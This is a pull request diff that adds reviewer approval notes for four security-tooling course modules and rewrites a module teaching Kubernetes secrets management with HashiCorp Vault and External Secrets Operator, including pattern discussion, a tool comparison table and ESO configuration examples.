### PR TITLE
content(platform): Toolkits security-tools 4.1/4.2/4.3/4.5 expand to T0 (#1996)

### DIFF
--- a/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.1-vault-eso.md
+++ b/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.1-vault-eso.md
@@ -1,0 +1,7 @@
+## 2026-06-15T20:51:46Z — `REVIEW` — `APPROVE`
+
+**Reviewer:** opus-inline cross-family R1 (≠ author cursor/Kimi; no gemini) + ground-check + web-verify. **#1996 (Toolkits).**
+
+Author: cursor `--model auto`. 437→5000 prose-w, 3→16 sources. Teaches secrets-management as a CAPABILITY spine (native Secret ≠ secrets management; external-store+sync / encrypted-in-Git / injection / dynamic-secrets patterns) with Vault + ESO as the illustrative worked example + a Rosetta. T0; all gates pass; Hypothetical scenario labeled; no leadership/fab claims; `has_47` False.
+
+**Ground-checks (all web-verified, all accurate):** Vault community edition under **BSL** since Aug 2023; **OpenBao** = Linux Foundation **OpenSSF** MPL-2.0 fork of Vault 1.14 (verified openbao.org/blog/openbao-joins-the-openssf + openssf.org); **IBM completed HashiCorp acquisition 27 Feb 2025** ($6.4B); **ESO = CNCF Sandbox** (accepted 2022-07-26, incubation deferred). License/ownership facts correctly quarantined in the dated snapshot. **APPROVE.**

--- a/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.2-opa-gatekeeper.md
+++ b/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.2-opa-gatekeeper.md
@@ -1,0 +1,7 @@
+## 2026-06-15T20:51:46Z — `REVIEW` — `APPROVE`
+
+**Reviewer:** opus-inline cross-family R1 (≠ author codex/OpenAI; no gemini) + ground-check + web-verify. **#1996 (Toolkits).**
+
+Author: codex gpt-5.5. 317→5128 prose-w, 4→24 sources. Exemplary durable-vendor handling: teaches policy-as-code admission as a CAPABILITY (admission chain, validating/mutating, audit-vs-enforce rollout) with OPA Gatekeeper as the worked example + the native ValidatingAdmissionPolicy shift + a Rosetta. T0; all gates pass; Hypothetical scenario labeled; "the Rosetta table is not a ranking"; no fab claims.
+
+**Ground-checks (all web-verified, all accurate + cited inline):** **ValidatingAdmissionPolicy GA in K8s 1.30** (cited the 2024-04-24 GA blog); **OPA CNCF Graduated** (2021); **Kyverno CNCF Graduated — moved 2026-03-16, announced 2026-03-24** (matches cncf.io announcement); MutatingAdmissionPolicy correctly hedged as version-dependent (stable 1.36 vs the 1.35 content standard — "verify on your cluster"). Every volatile claim dated + sourced. **APPROVE.**

--- a/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.3-falco.md
+++ b/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.3-falco.md
@@ -1,0 +1,7 @@
+## 2026-06-15T20:51:46Z — `REVIEW` — `CHANGES_REQUESTED` → fixed → `APPROVE`
+
+**Reviewer:** opus-inline cross-family R1 (≠ author deepseek; no gemini) + ground-check + web-verify. **#1996 (Toolkits).**
+
+Author: deepseek-v4-pro. 430→5030 prose-w, 4→12 sources. Teaches runtime threat DETECTION as the capability (vs build/deploy controls), with Falco as the worked example (drivers/modern-eBPF, rules, plugins, Falcosidekick, Talon); correctly differentiated from 4.5-tetragon (detection vs enforcement). T0; all gates pass; Hypothetical scenario labeled (round illustrative numbers); no fabricated company stats.
+
+**Finding (FIXED by orchestrator):** the Rosetta CNCF-status row labeled **Tetragon as "Sandbox (as of 2026)"** — inaccurate. Web-verified (cncf.io/projects/cilium + tetragon.io + the OpenSSF/Cilium sources): **Tetragon is a Cilium SUB-PROJECT, not a separately-rated CNCF project**; Cilium is Graduated (2023-10-11). Corrected the cell → "Cilium sub-project (Cilium is Graduated; Tetragon not separately rated)" (consistent with 4.5's correct framing). Verified accurate: **Falco CNCF Graduated Feb 2024**, **KubeArmor CNCF Sandbox**, Sysdig commercial. Post-fix re-verified T0. **APPROVE.**

--- a/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.5-tetragon.md
+++ b/.pipeline/reviews/platform__toolkits__security-quality__security-tools__module-4.5-tetragon.md
@@ -1,0 +1,7 @@
+## 2026-06-15T20:51:46Z — `REVIEW` — `APPROVE`
+
+**Reviewer:** opus-inline cross-family R1 (≠ author cursor/Kimi; no gemini) + ground-check + web-verify. **#1996 (Toolkits).**
+
+Author: cursor `--model auto`. 348→5333 prose-w, 4→16 sources. Teaches eBPF runtime security as observability + in-kernel ENFORCEMENT (the angle that differentiates it from 4.3-falco's detection focus), with Tetragon as the worked example (TracingPolicy CRD, kprobes/LSM hooks, Signal/Override/NotifyEnforcer actions, process ancestry) + a Rosetta. T0; all gates pass; Hypothetical scenarios labeled; "assign roles rather than pick a single winner"; no fab claims.
+
+**Ground-checks (web-verified, all accurate):** correctly frames **Tetragon as developed within the Cilium ecosystem, NOT a separate CNCF project listing** (Cilium Graduated 2023-10-11); **Falco Graduated Feb 2024**; **KubeArmor CNCF Sandbox**. This module's correct Tetragon-maturity framing is what flagged the parallel error in 4.3 (now fixed). **APPROVE.**

--- a/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.1-vault-eso.md
+++ b/src/content/docs/platform/toolkits/security-quality/security-tools/module-4.1-vault-eso.md
@@ -1,4 +1,5 @@
 ---
+revision_pending: false
 title: "Module 4.1: Vault & External Secrets"
 slug: platform/toolkits/security-quality/security-tools/module-4.1-vault-eso
 sidebar:
@@ -6,241 +7,107 @@ sidebar:
 ---
 > **Toolkit Track** | Complexity: `[COMPLEX]` | Time: 45-50 minutes
 
-## Overview
-
-Hardcoded secrets in Git are a security incident waiting to happen. This module covers HashiCorp Vault for enterprise secrets management and External Secrets Operator (ESO) for syncing secrets from external providers into Kubernetes.
-
-**What You'll Learn**:
-- Vault architecture and secrets engines
-- External Secrets Operator patterns
-- Multi-tenant secrets management
-- Secret rotation strategies
-
-**Prerequisites**:
-- [DevSecOps Discipline](/platform/disciplines/reliability-security/devsecops/)
-- Kubernetes Secrets basics
-- RBAC concepts
-
----
-
 ## What You'll Be Able to Do
 
-After completing this module, you will be able to:
+Completing this module equips you to design and operate Kubernetes secret delivery using external stores rather than ad hoc copies, with Vault and External Secrets Operator as the reference implementation throughout the exercises and quiz scenarios.
 
 - **Implement External Secrets Operator to sync Vault secrets into Kubernetes Secrets automatically**
 - **Configure Vault's Kubernetes authentication and dynamic secret generation for database credentials**
 - **Secure secret rotation with zero-downtime patterns: `refreshInterval` on ExternalSecrets for KV sync, and `VaultDynamicSecret` generators for Vault dynamic engines (database, PKI, cloud)**
 
+---
 
 ## Why This Module Matters
 
-Every production breach post-mortem includes "we found credentials in..." somewhere. Secrets sprawl is inevitable without proper tooling. Vault and ESO provide the infrastructure to manage secrets at scale—centralized storage, automatic rotation, audit trails, and least-privilege access.
+**Hypothetical scenario:** A platform team migrates three hundred application credentials from hand-maintained Kubernetes `Secret` objects into a centralized external store during a staged cutover. The migration plan looks clean on paper: each team declares an `ExternalSecret`, ESO materializes native Secrets, and GitOps repos finally contain only references instead of base64 blobs. On cutover night, two namespaces lose database connectivity because several `remoteRef.key` paths pointed at retired KV paths, and one team deleted their legacy Secrets before the controller reported `SecretSynced`. Recovery takes most of a weekend because nobody had a single dashboard showing sync status across clusters, and audit logs could not answer which pod last read the compromised static password that had lived in a ConfigMap for two years.
 
-> 💡 **Did You Know?** Vault has long been a core secrets platform in many enterprise environments. Its design philosophy of "secrets as a service" fundamentally changed how organizations think about credential lifecycle and access.
+That scenario is illustrative, not a report of a specific organization. The durable lesson is that **secrets management on Kubernetes is a systems problem**, not a storage problem. Native `Secret` objects solve the narrow API contract—mount env vars, project volumes—but they do not solve lifecycle, rotation, GitOps safety, blast-radius control, or authoritative audit. External stores plus sync operators (we use **External Secrets Operator** with **HashiCorp Vault** as the running backend) address the lifecycle layer while still letting existing workloads consume familiar Kubernetes primitives.
 
----
+Every production breach post-mortem eventually surfaces credentials in an unexpected place: a committed `.env` file, a CI variable with overly broad scope, a `ConfigMap` that was never meant to hold passwords, or a long-lived database user shared by twelve microservices. **Secrets sprawl** is what happens when convenience wins over control. The durable capability you are learning is how to **centralize authority**, **automate rotation**, **scope access per workload**, and **keep Git repositories free of plaintext**—using Vault and ESO as concrete tools, not as the subject of a product tour.
 
-## The Secrets Problem
-
-```
-THE SECRETS SPRAWL PROBLEM
-════════════════════════════════════════════════════════════════════
-
-Where secrets end up without proper management:
-
-┌─────────────────────────────────────────────────────────────────┐
-│                     SECRETS SPRAWL                               │
-│                                                                  │
-│   .env files ───────────┐                                       │
-│   Git repos ────────────┤                                       │
-│   CI/CD variables ──────┼───▶ 😱 UNCONTROLLED ACCESS            │
-│   ConfigMaps ───────────┤         No audit trail                │
-│   Shell history ────────┤         No rotation                   │
-│   Slack messages ───────┘         Shared passwords              │
-│                                                                  │
-└─────────────────────────────────────────────────────────────────┘
-
-With Vault + ESO:
-
-┌─────────────────────────────────────────────────────────────────┐
-│                     CENTRALIZED SECRETS                          │
-│                                                                  │
-│                    ┌─────────────┐                              │
-│   App A ──────────▶│             │                              │
-│   App B ──────────▶│    VAULT    │◀── Audit every access        │
-│   App C ──────────▶│             │◀── Automatic rotation        │
-│   CI/CD ──────────▶│             │◀── Least privilege           │
-│                    └─────────────┘                              │
-│                          │                                       │
-│                          ▼                                       │
-│                    ┌─────────────┐                              │
-│                    │     ESO     │──▶ Kubernetes Secrets        │
-│                    └─────────────┘                              │
-│                                                                  │
-└─────────────────────────────────────────────────────────────────┘
-```
+Platform engineers inherit this problem whether or not applications "use Vault." If any team can `kubectl create secret generic` with a shared password, you already operate a shadow store with no rotation, no audit, and unbounded duplication into Helm values and CI caches. Standardizing on ESO does not remove human creativity—it **redirects** it: instead of inventing another S3 bucket of `.env` files, teams declare ExternalSecrets that platform reviewers can grep in Git. The win is visibility and consistent controls, not a magic elimination of secrets from the cluster entirely.
 
 ---
 
-## HashiCorp Vault
+## The Kubernetes Native Secret Problem
 
-### Architecture
+Kubernetes `Secret` objects look like security primitives because the API names them secrets, but the platform treats them as typed configuration blobs with mild obfuscation. Values in `data` and `stringData` fields are **base64-encoded**, which is encoding for transport—not encryption. Anyone with RBAC read access to Secrets in a namespace, access to etcd backups, or access to the control plane audit stream can recover cleartext without breaking cryptography. **Encryption at rest** for etcd is optional and configured cluster-wide through `EncryptionConfiguration` and often a KMS provider; it protects etcd media, not every downstream consumer, and it does not fix overly broad RBAC or accidental logging of environment variables.
 
-```
-VAULT ARCHITECTURE
-════════════════════════════════════════════════════════════════════
+The GitOps conflict makes the problem sharper. Declarative repositories want to be the source of truth for desired state, yet committing cleartext credentials violates every reasonable security policy. Teams respond with anti-patterns: sealed blobs checked into Git without rotation discipline, manual `kubectl create secret` steps documented in runbooks, or secrets duplicated into CI systems that outlive the engineers who created them. Each workaround creates a **second source of truth** that drifts from the application manifests operators actually deploy.
 
-┌─────────────────────────────────────────────────────────────────┐
-│                         VAULT CLUSTER                            │
-│                                                                  │
-│  ┌─────────────────────────────────────────────────────────┐   │
-│  │                    API / CLI                             │   │
-│  └─────────────────────┬───────────────────────────────────┘   │
-│                        │                                        │
-│  ┌─────────────────────▼───────────────────────────────────┐   │
-│  │                  AUTH METHODS                            │   │
-│  │  ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐       │   │
-│  │  │  K8s    │ │  OIDC   │ │  LDAP   │ │  Token  │       │   │
-│  │  └─────────┘ └─────────┘ └─────────┘ └─────────┘       │   │
-│  └─────────────────────────────────────────────────────────┘   │
-│                        │                                        │
-│  ┌─────────────────────▼───────────────────────────────────┐   │
-│  │                 SECRETS ENGINES                          │   │
-│  │  ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐       │   │
-│  │  │   KV    │ │Database │ │   PKI   │ │  AWS    │       │   │
-│  │  │(static) │ │(dynamic)│ │ (certs) │ │(dynamic)│       │   │
-│  │  └─────────┘ └─────────┘ └─────────┘ └─────────┘       │   │
-│  └─────────────────────────────────────────────────────────┘   │
-│                        │                                        │
-│  ┌─────────────────────▼───────────────────────────────────┐   │
-│  │                    STORAGE                               │   │
-│  │         Raft (integrated) / Consul / etcd               │   │
-│  └─────────────────────────────────────────────────────────┘   │
-│                                                                  │
-└─────────────────────────────────────────────────────────────────┘
-```
+RBAC leakage amplifies blast radius. A `Secret` mounted into one Deployment may be readable by any identity with `get/list` on Secrets in that namespace, including debugging tools, misconfigured CI jobs, and compromised service accounts. Native Secrets also land in etcd with object versioning; backups, snapshots, and test-cluster restores copy them forward unless you operate rigorous key rotation and deletion practices. **The durable insight:** Kubernetes gives you a **delivery mechanism** for sensitive material to pods; it does not give you **secrets management**—generation, policy, rotation, leasing, auditing, and emergency revocation across environments.
 
-### Key Concepts
+Control-plane operators sometimes assume **EncryptionConfiguration** alone satisfies auditors. Encryption at rest protects backup media and etcd disks from casual inspection, yet it does not prevent authorized API clients from reading decrypted content through normal Kubernetes APIs. Key rotation for encryption providers is also a planned event: providers and keys must be updated in order without leaving objects unreadable. Treat etcd encryption as a necessary layer in depth, then implement external lifecycle management for anything an attacker would actually exfiltrate during a realistic compromise—long-lived API tokens, database passwords, signing keys—not as a substitute for those practices.
 
-| Concept | Description | Example |
-|---------|-------------|---------|
-| **Secrets Engine** | Backend that stores/generates secrets | KV, Database, PKI, AWS |
-| **Auth Method** | How clients authenticate | Kubernetes, OIDC, LDAP |
-| **Policy** | What secrets a client can access | Read `secret/data/app/*` |
-| **Token** | Credential returned after auth | Used for subsequent requests |
-| **Lease** | TTL on dynamic secrets | Database creds expire in 1h |
-
-### Secrets Engines Deep Dive
-
-```
-SECRETS ENGINE TYPES
-════════════════════════════════════════════════════════════════════
-
-KV (Key-Value) - Static Secrets
-─────────────────────────────────────────────────────────────────
-Use: API keys, passwords, config that doesn't change often
-Features: Versioning, soft delete, metadata
-
-vault kv put secret/myapp/config \
-  api_key="sk-xxx" \
-  db_password="hunter2"
-
-vault kv get secret/myapp/config
-
-
-Database - Dynamic Secrets
-─────────────────────────────────────────────────────────────────
-Use: Database credentials with automatic rotation
-Features: Per-connection creds, TTL, automatic revocation
-
-# Configure database connection
-vault write database/config/postgres \
-  plugin_name=postgresql-database-plugin \
-  connection_url="postgresql://{{username}}:{{password}}@postgres:5432" \
-  allowed_roles="readonly" \
-  username="vault" \
-  password="vault-password"
-
-# Create role
-vault write database/roles/readonly \
-  db_name=postgres \
-  creation_statements="CREATE ROLE \"{{name}}\" WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}'; GRANT SELECT ON ALL TABLES IN SCHEMA public TO \"{{name}}\";" \
-  default_ttl="1h" \
-  max_ttl="24h"
-
-# Get credentials (new user each time!)
-vault read database/creds/readonly
-
-
-PKI - Certificate Authority
-─────────────────────────────────────────────────────────────────
-Use: TLS certificates for services
-Features: Short-lived certs, automatic renewal
-
-vault write pki/issue/web-certs \
-  common_name="api.example.com" \
-  ttl="720h"
-```
-
-> 💡 **Did You Know?** Dynamic database secrets are Vault's killer feature. Instead of one shared database password, each application instance gets unique credentials that automatically expire. When a credential leaks, you know exactly which instance was compromised.
-
-### Vault Policies
-
-```hcl
-# policies/app-readonly.hcl
-# Read-only access to app secrets
-
-path "secret/data/myapp/*" {
-  capabilities = ["read", "list"]
-}
-
-path "secret/metadata/myapp/*" {
-  capabilities = ["list"]
-}
-
-# Deny access to admin secrets
-path "secret/data/admin/*" {
-  capabilities = ["deny"]
-}
-```
-
-```bash
-# Apply policy
-vault policy write app-readonly policies/app-readonly.hcl
-
-# Create token with policy
-vault token create -policy=app-readonly
-```
-
-### Kubernetes Authentication
-
-```bash
-# Enable Kubernetes auth
-vault auth enable kubernetes
-
-# Configure it to talk to K8s API
-vault write auth/kubernetes/config \
-  kubernetes_host="https://kubernetes.default.svc" \
-  kubernetes_ca_cert=@/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
-
-# Create role for app pods
-vault write auth/kubernetes/role/myapp \
-  bound_service_account_names=myapp \
-  bound_service_account_namespaces=production \
-  audiences=vault \
-  policies=app-readonly \
-  ttl=1h
-```
-
-> **Note:** Vault 1.21+ validates token `aud` claims for Kubernetes auth roles. Ensure `audiences` matches the service account token audience claim (commonly `vault` in managed clusters).
+Application developers experience the gap as **environment variable convenience**. Twelve-factor guidance encourages config via env vars, which Kubernetes satisfies through `envFrom.secretRef`. That pattern is ergonomically excellent and security-poor when the backing Secret is static, widely readable, and copied into logs by frameworks that print configuration on startup at debug level. Platform defaults should steer teams toward **projected volumes**, **read-only mounts**, and **external sync with rotation** while linters flag `secretKeyRef` usage for highly sensitive key names in pull requests.
 
 ---
 
-## External Secrets Operator (ESO)
+## Durable Solution Patterns
 
-### Why ESO?
+Mature platforms combine one or more patterns below. None is universally superior; each optimizes different constraints: GitOps compatibility, whether a native `Secret` ever exists, rotation cadence, operational complexity, and cloud portability.
 
-Vault is great, but applications expect Kubernetes Secrets. ESO bridges the gap:
+**External store plus sync operator.** A controller running in the cluster authenticates to an authoritative backend (Vault KV, cloud secret manager, 1Password, and others) and materializes a native Kubernetes `Secret`. **External Secrets Operator (ESO)** is the worked example in this module: you declare `SecretStore`/`ClusterSecretStore` for connectivity and auth, then `ExternalSecret` for desired keys, refresh interval, and templating. Applications keep using `secretKeyRef`; the platform gains centralized rotation and audit at the backend. Tradeoff: a native `Secret` still exists in etcd unless you add additional controls—so RBAC and encryption-at-rest remain relevant.
+
+**Encrypted-in-Git.** Tools such as **Sealed Secrets** and **SOPS with age** let you commit ciphertext that only the cluster (or holders of private keys) can decrypt. This preserves GitOps purity without plaintext in remotes. Tradeoff: rotation and access distribution follow key-management rules you own; dynamic database credentials are not the sweet spot unless paired with another pattern.
+
+**Sidecar or CSI injection.** **Vault Agent Injector** and the **Secrets Store CSI Driver** with provider plugins mount secrets as files or env sources **without** creating a Kubernetes `Secret` object. The material travels directly from the backend to the pod filesystem or memory according to policy. Tradeoff: stronger reduction of etcd exposure, but you must ensure application and sidecar lifecycle align, and local node compromise remains in scope.
+
+**Dynamic and short-lived secrets.** Backends like Vault **database**, **PKI**, and **cloud** engines mint credentials with **TTL and lease** metadata. Each request can yield unique usernames, passwords, or certificates that expire automatically. Tradeoff: applications must tolerate rotation or rely on frequent sync; operations gain precise blast-radius containment when a credential leaks.
+
+Teaching these patterns as a **capability spine** keeps the module valid even when individual vendors rev versions or licenses. Vault and ESO appear throughout as **illustrative** implementations; the Rosetta table later maps the same capabilities to peer tools.
+
+Understanding **when to combine patterns** matters as much as picking one. A typical progressive adoption path starts with encrypted-in-Git or a cloud manager for bootstrap credentials, introduces ESO for application delivery once roles exist, and reserves injection for tiers where etcd persistence is unacceptable. Skipping straight to injection everywhere often overwhelms platform teams with sidecar lifecycles before basic RBAC hygiene is fixed. Conversely, stopping at native Secrets synced from Vault without etcd encryption or namespace RBAC reviews leaves a false sense of completion because the delivery problem is solved while the persistence and access problems remain largely unchanged.
+
+The **authoritative store** concept is the hinge. Exactly one system should mint, rotate, and revoke a credential; every downstream copy—Kubernetes `Secret`, mounted file, or CI variable—is a cache with expectations attached. When caches multiply without TTL discipline, incident response becomes archaeology: five copies of the same API key with unknown readers and unknown rotation cadence. Platform engineering success is measured by shrinking the number of caches and shortening their lifetimes, not by accumulating more secret-shaped objects across clusters.
+
+---
+
+## GitOps, Compliance, and the Second Source of Truth
+
+
+## Landscape Snapshot and Rosetta
+
+> **Landscape snapshot — as of 2026-06. This changes fast; verify against vendor docs before relying on specifics.**
+>
+> - **HashiCorp Vault** community edition is distributed under the **Business Source License (BSL)**; HashiCorp announced the license change in August 2023. See [Vault licensing](https://developer.hashicorp.com/vault/docs/license).
+> - **OpenBao** is a community fork maintained under **MPL 2.0**, hosted under the Linux Foundation OpenSSF umbrella; it targets API compatibility with the Vault 1.14-era lineage. See [OpenBao documentation](https://openbao.org/docs/).
+> - **IBM completed its acquisition of HashiCorp** on **27 February 2025** per [IBM's announcement](https://newsroom.ibm.com/2025-02-27-ibm-completes-acquisition-of-hashicorp,-creates-comprehensive,-end-to-end-hybrid-cloud-platform).
+> - **External Secrets Operator** is a **CNCF Sandbox** project (accepted **26 July 2022**); an incubation application was deferred in 2024 with guidance to strengthen maintainer sustainability—see [CNCF project page](https://www.cncf.io/projects/external-secrets/) and the [TOC incubation thread](https://github.com/cncf/toc/issues/1486).
+> - **Sealed Secrets** and **SOPS** remain widely used encrypted-in-Git options; **Secrets Store CSI Driver** is a Kubernetes SIG subproject for mount-time injection.
+
+| Capability | ESO + Vault (this module) | Sealed Secrets | SOPS + age | Vault Agent Injector | Secrets Store CSI | Cloud secret managers (AWS/GCP/Azure) |
+|------------|---------------------------|----------------|------------|----------------------|-------------------|---------------------------------------|
+| Sync to native K8s `Secret` | Yes — core ESO flow | Yes — decrypt in cluster | Yes — with tooling | No — direct injection | Optional — often avoids etcd Secret | Yes — via ESO providers |
+| Encrypted-in-Git | Indirect — refs only in Git | Yes — SealedSecret CRD | Yes — ciphertext in repo | No | No | No |
+| CSI / sidecar injection | Via separate Vault tooling | No | No | Yes | Yes — provider plugins | Via provider-specific drivers |
+| Dynamic secrets (DB/PKI/cloud) | Yes — Vault engines + ESO generators | No | No | Yes — Vault native | Yes — with Vault provider | Limited — cloud-native scopes |
+| GitOps-safe declarative refs | Yes — ExternalSecret manifests | Yes — SealedSecret manifests | Yes — encrypted files | Partial — annotations on pods | Partial — SecretProviderClass | Yes — provider CRDs |
+| Multi-backend portability | High — ESO provider model | Low — cluster-bound keys | Medium — key distribution | Vault-centric | Provider-dependent | Cloud-vendor scoped |
+
+Use the Rosetta to **choose patterns**, not to crown a winner. Many production platforms blend **ESO for application Secrets**, **CSI or Agent** for especially sensitive tiers, and **SOPS or Sealed Secrets** for bootstrapping or offline disaster bundles.
+
+License and ownership facts belong in the snapshot precisely because they churn independently of the capability model. A team standardized on Vault CE under MPL years ago may need a deliberate review after BSL and corporate acquisition headlines—not because the architecture was wrong, but because procurement, redistribution, and fork strategy assumptions changed. Likewise, CNCF Sandbox status tells you about governance maturity and ecosystem visibility, not about whether ESO's CRDs fit your GitOps workflow today. Treat maturity labels as planning inputs; validate fit with proofs of concept against your backends and your compliance regime.
+
+---
+
+## GitOps, Compliance, and the Second Source of Truth
+
+GitOps repositories want to describe **desired state** completely, yet security policy forbids cleartext credentials in Git remotes, issue trackers, and public CI logs. The durable resolution is to commit **references and contracts**—which keys a workload needs, which store backs them, refresh expectations—while keeping **values** in systems designed for confidentiality and audit. ExternalSecret manifests embody that contract: reviewers see names, namespaces, and backend paths in diffs without seeing passwords.
+
+Compliance frameworks frequently ask who accessed a secret, when rotation last occurred, and whether emergency revocation is practiced. Native Kubernetes Secrets offer limited answers: RBAC tells you who may read objects, not who did read them at what time, unless you invest heavily in audit logging and still miss off-cluster copies. Central backends like Vault add **request audit trails** when devices are enabled, tying authentication identity to path operations. ESO becomes the **delivery agent** in that story rather than the **system of record**, which simplifies reasoning during audits: Vault (or your cloud manager) holds history; Kubernetes holds current materialized state for pod consumption.
+
+Sealed Secrets and SOPS remain valuable when teams need **air-gapped bootstrap** or when the secret store itself requires credentials that cannot yet be delivered dynamically. The anti-pattern is using encrypted-in-Git for high-churn database passwords because rotation becomes a re-encryption ceremony across every branch and environment. Pair encrypted-in-Git with static, rarely changed material—initial Vault unseal shards stored offline, emergency break-glass bundles—and pair ESO with material that rotates on schedule or on demand.
+
+---
+
+## External Secrets Operator: Architecture and CRDs
+
+External Secrets Operator watches custom resources and reconciles desired secret material into Kubernetes. The mental model is **declare intent, not copy/paste**: platform teams commit `ExternalSecret` manifests to Git; the controller handles fetch, transformation, and ownership of the target native `Secret`. ESO is **backend-agnostic**—the same CRD shapes work for Vault, AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and numerous community providers documented on [external-secrets.io](https://external-secrets.io/latest/introduction/overview/).
+
+**SecretStore** is namespaced: it encodes how to reach a backend and how the controller authenticates in that namespace. **ClusterSecretStore** is cluster-scoped and typically pairs with a centrally managed service account and tighter policy, optionally constrained by namespace selectors or conditions. Splitting store connectivity from secret mapping lets platform teams publish vetted backends while application teams own only the keys they need.
+
+**ExternalSecret** binds a store to a target native `Secret`. Important fields include `refreshInterval` (how often to reconcile), `data`/`dataFrom` (key mapping or bulk extract), `target.template` (compose connection strings or TLS keystores), and ownership policies such as `creationPolicy: Owner` so deleting the `ExternalSecret` can garbage-collect the materialized Secret. **PushSecret** (see ESO docs) reverses flow for scenarios that must write generated material back to a backend—useful for hybrid migrations but less common day-to-day than pull sync.
 
 ```
 ESO FLOW
@@ -274,10 +141,9 @@ ESO FLOW
 └─────────────────────────────────────────────────────────────────┘
 ```
 
-### Installation
+Installation commonly uses the upstream Helm chart with CRDs bundled. Production clusters should pin chart versions, run the controller with least-privilege RBAC, and network-policy the egress path to Vault or cloud APIs.
 
 ```bash
-# Install ESO via Helm
 helm repo add external-secrets https://charts.external-secrets.io
 helm repo update
 
@@ -287,7 +153,17 @@ helm install external-secrets external-secrets/external-secrets \
   --set installCRDs=true
 ```
 
-### SecretStore vs ClusterSecretStore
+When debugging sync failures, treat the **`ExternalSecret` status conditions** and controller logs as primary signals. A typo in `remoteRef.key` for Vault KV v2 is a frequent root cause: ESO expects the logical secret name (for example `production/database`), not the internal `secret/data/...` API path exposed in Vault CLI output.
+
+Operational maturity shows up in **how teams observe sync health at scale**. A single `kubectl describe` suffices in a lab; production needs aggregated views—Prometheus metrics if you expose them, GitOps health checks, or periodic controllers that alert when any `ExternalSecret` in a fleet reports error states beyond a short grace window. Treat desync like a broken deployment: it is user-visible only when applications fail, but the control-plane signal existed earlier in the ExternalSecret status.
+
+**PushSecret** deserves a mention even when pull sync dominates day-to-day work. Some migrations require writing generated or rotated material from Kubernetes back into a legacy vault path so mainframe-era batch systems or external SaaS with manual upload portals stay synchronized. Push flows invert trust boundaries: the cluster becomes a writer, not only a reader, so policies must be tighter and audits more frequent. Default to pull sync unless a documented integration requires push.
+
+---
+
+## External Secrets Operator: Store and Sync Examples
+
+The YAML below shows the two store scopes and three common `ExternalSecret` shapes: per-key mapping, bulk extract, and templated connection strings. These examples assume Vault KV v2 mounted at `secret/`; adjust `server`, `path`, and auth to match your environment.
 
 ```yaml
 # SecretStore - namespaced
@@ -295,7 +171,7 @@ apiVersion: external-secrets.io/v1beta1
 kind: SecretStore
 metadata:
   name: vault-backend
-  namespace: production  # Only usable in this namespace
+  namespace: production
 spec:
   provider:
     vault:
@@ -313,7 +189,7 @@ spec:
 apiVersion: external-secrets.io/v1beta1
 kind: ClusterSecretStore
 metadata:
-  name: vault-backend  # No namespace - usable from any namespace
+  name: vault-backend
 spec:
   provider:
     vault:
@@ -327,11 +203,7 @@ spec:
           serviceAccountRef:
             name: "external-secrets"
             namespace: "external-secrets"
-```
-
-### ExternalSecret Examples
-
-```yaml
+---
 # Basic secret sync
 apiVersion: external-secrets.io/v1beta1
 kind: ExternalSecret
@@ -339,18 +211,18 @@ metadata:
   name: database-credentials
   namespace: production
 spec:
-  refreshInterval: 1h  # How often to sync
+  refreshInterval: 1h
   secretStoreRef:
     name: vault-backend
     kind: SecretStore
   target:
-    name: database-credentials  # K8s Secret name
-    creationPolicy: Owner       # ESO owns the Secret
+    name: database-credentials
+    creationPolicy: Owner
   data:
-  - secretKey: username         # Key in K8s Secret
+  - secretKey: username
     remoteRef:
       key: production/database
-      property: username        # Key in Vault
+      property: username
   - secretKey: password
     remoteRef:
       key: production/database
@@ -399,151 +271,167 @@ spec:
       property: password
 ```
 
-> 💡 **Did You Know?** ESO supports 20+ secret providers including AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and even 1Password. You can migrate between cloud providers without changing your application code—just update the SecretStore.
+Templating is how platforms keep application interfaces stable while backends evolve—teams store atomic fields in Vault but deliver a single `DATABASE_URL` env var the app already understands. Keep templates in Git-reviewed manifests so connection string composition stays auditable.
+
+When multiple applications consume overlapping keys from one Vault path, prefer **`dataFrom.extract`** with careful **`target.template`** merging rather than duplicating `remoteRef` stanzas per Deployment. Central teams can publish "golden" ExternalSecret patterns in internal catalogs so application repos only parameterize namespace, secret name, and key prefix. That reduces drift where each team copies YAML from outdated blog posts with subtly wrong `path` or `version` fields.
+
+Production stores should enforce **TLS verification** on Vault endpoints (`caProvider` or cert bundles in provider config per ESO docs) rather than disabling TLS checks to unblock labs. Similarly, restrict which namespaces may reference a `ClusterSecretStore` using Kubernetes admission policy in addition to ESO conditions—defense in depth beats assuming developers will never paste a cluster store reference into an experimental namespace.
 
 ---
 
-## Multi-Tenant Patterns
+## HashiCorp Vault as an External Store
 
-### Namespace Isolation
+Vault is a secrets and identity backend organized around **auth methods**, **secrets engines**, and **policies**. Clients authenticate, receive a **token** with attached policies, then access paths permitted by those policies. Audit devices record requests when enabled. Storage backends (commonly integrated Raft in modern deployments) hold encrypted blobs; **unseal** operations protect master keys. This module treats Vault as the **authoritative store** ESO reads—not as the only valid choice. **OpenBao** exposes a compatible API surface for teams prioritizing OSI-approved licensing; ESO provider configuration is largely analogous though you must verify version matrices in provider docs.
+
+Teams evaluating **Vault versus OpenBao** should separate licensing questions from architecture questions. The capability spine—dynamic engines, Kubernetes auth, injection, ESO sync—is shared because APIs intentionally align. Differences emerge in enterprise feature packaging, long-term roadmap ownership, and organizational comfort with BSL source-available terms after IBM's acquisition of HashiCorp. Neither choice removes the obligation to operate HA storage, backup, and unseal procedures correctly; a misconfigured cluster fails equally embarrassingly regardless of trademark on the binary.
+
+High availability for the external store is a dependency of every synced Secret. If Vault is down, ESO cannot reconcile; applications may continue with last-synced material until TTLs expire, then fail in bulk. Run game days that include Vault outage simulation so teams know whether applications fail open or closed and whether on-call playbooks prioritize restoring Vault or temporarily pinning emergency KV versions. Document RTO/RPO for secrets separately from application RTO because they are coupled during incidents even when charts treat them as independent microservices.
 
 ```
